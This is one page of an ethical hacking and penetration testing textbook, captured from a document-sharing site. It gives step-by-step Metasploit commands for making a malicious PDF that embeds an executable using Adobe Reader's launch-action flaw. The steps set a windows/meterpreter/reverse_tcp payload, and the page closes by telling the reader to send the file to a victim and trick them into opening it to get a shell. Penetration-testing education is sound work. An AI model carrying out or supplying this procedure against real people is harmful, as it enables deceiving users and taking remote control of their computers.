Ethical Hacking and Penetration Testing Guide

Yüklə 22,44 Mb.

Pdf görüntüsü

səhifə	133/235
tarix	07.08.2023
ölçüsü	22,44 Mb.
	#138846

1 ... 129 130 131 132 133 134 135 136 ... 235

Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Adobe PDF Embedded EXE

Adobe PDF Embedded EXE
This is one of the most popular PDF exploits in Metasploit. This exploit embeds an executable in
a PDF document and takes advantage of the PDF launch action vulnerability found inside the
previous versions of Adobe Reader to exploit it.
The best exploit for the ABC company scenario will be a fileformat exploit, and what could
be better than to use an Adobe PDF Embedded EXE for this task. So let’s go ahead and create a
malicious PDF template with Metasploit.
Step 1
—Fire up Metasploit by typing “msfconsole” in the terminal.
Step 2
—Next, type in “use exploit/windows/fileformat/adobe_pdf_embedded_exe”.
Step 3—
Next, type “show options”. It will display the requirements you need to in order to
create a template. You can use a predefined template, e.g., evil.pdf, or define a PDF that you
want the exe to be embedded in.
We can also see that the “INFILENAME” is required, so we need a blank PDF file in which it
will embed the exe. You can use any PDF file you want.

Client Side Exploitation
◾
211
You can also edit the launch action message depending upon the scenario. You can do this by
typing the following command:
set LAUNCH_Message
Step 4
—Once you are done with the exploit part, you need to choose an appropriate payload.
To choose a payload, type the following command:
set payload windows/meterpreter/reverse_tcp
The payload will be followed by the LHOST and LPORT
Step 5
—Then type “exploit” and it will generate your malicious PDF file. It will save the PDF
file in the
/root/.msf4/local/
directory.
Finally, we will send it to the victim and trick him into executing it. Once it is executed, you
will have injected a Meterpreter shell on his computer.

Yüklə 22,44 Mb.

Dostları ilə paylaş:

1 ... 129 130 131 132 133 134 135 136 ... 235